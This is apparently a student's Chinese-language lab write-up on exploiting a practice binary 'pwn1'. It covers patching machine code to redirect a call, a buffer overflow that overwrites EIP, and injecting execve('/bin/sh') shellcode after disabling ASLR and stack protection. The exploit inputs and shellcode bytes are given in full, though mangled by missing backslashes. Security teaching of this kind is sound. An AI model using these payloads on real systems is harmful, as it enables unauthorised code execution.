1、直接修改程序机器指令,改变程序执行流程
2、通过构造输入参数,造成BOF攻击,改变程序执行流
3、注入Shellcode并执行
4、实验感想
注:因为截图是全屏所以右键图片在新的标签页打开观看更加。实验开始前可以使用cp pwn1 -p pwn2复制一个文件,不然做完第一步实验还要把文件改回去才能继续做后面的部分。
NOP汇编指令的机器码是"90"
JNE汇编指令的机器码是"75"
JE 汇编指令的机器码是"74"
JMP汇编指令的机器码是"eb"
CMP汇编指令的机器码是"39"
1、直接修改程序机器指令,改变程序执行流程
-
首先使用
objdump -d pwn1将pwn1程序进行反汇编
-
看见了main函数中的call(跳转)指令,通过计算foo函数与getshell函数的地址偏移量差值,知道了只需要将
d7 ff ff ff中的d7改为c3即可。
1、先用vi pwn1命令准备编辑
2、按下Esc输入:%!xxd将图中乱码转为16进制显示
3、输入/d7ff找到需要修改的地方,并修改
4、输入:%!xxd -r转为原格式(否则无法运行),并保存退出
2、通过构造输入参数,造成BOF攻击,改变程序执行流程
1、使用gdb调试pwn1
2、输入11111111122222222333333334444444455555555通过寄存器eip(用来存储CPU将要读取指令的地址)知道在数字5处开始报错
3、再次输入11111111122222222333333334444444412345678确定具体位置
4、知道了1234这4个数会覆盖eip寄存器
5、将这4个字符换为getshell的内存地址(图1中有),输入11111111222222223333333344444444x7dx84x04x08
3、 注入Shellcode并执行
1、需要修改以下设置
root@KaliYL:~# execstack -s pwn1 //设置堆栈可执行
root@KaliYL:~# execstack -q pwn1 //查询文件的堆栈是否可执行
X pwn1
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space
2
root@KaliYL:~# echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space
0
2、初步注入shellcode(结构为retaddr+nops+shellcode),输入perl -e 'print "x90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x4x3x2x1x00"' > input_shellcode
3、使用ps -ef | grep pwn1查看pwn1的进程号
4、使用gdb调试,查看buf的内存地址并使用break *0x080484ae设置断点,按c运行然后再正在运行pwn1的终端敲回车,回到gdb使用info r sep查看地址
5、使用x/16x 0xffffd33c查看其存放内容,看到了01020304,就是返回地址的位置。根据我们构造的input_shellcode可知,shellcode就在其后,所以地址是 0xffffd340。
使用x/16x 0xffffd33c查看其存放内容,看到了01020304,就是返回地址的位置。根据我们构造的input_shellcode可知,shellcode就在其后,所以地址是 0xffffd340。
6、将之前的x4x3x2x1改为这个地址即可
实验感想
又有了打开新世界大门的感觉。也是第一次感觉到能看懂汇编指令非常重要。这次的实验总体都很简单,老师上课也都一步一步讲过了,指导书也把步骤写的很详细(我没跳进坑里哈哈哈),这门课也才等于刚开始,好好加油吧!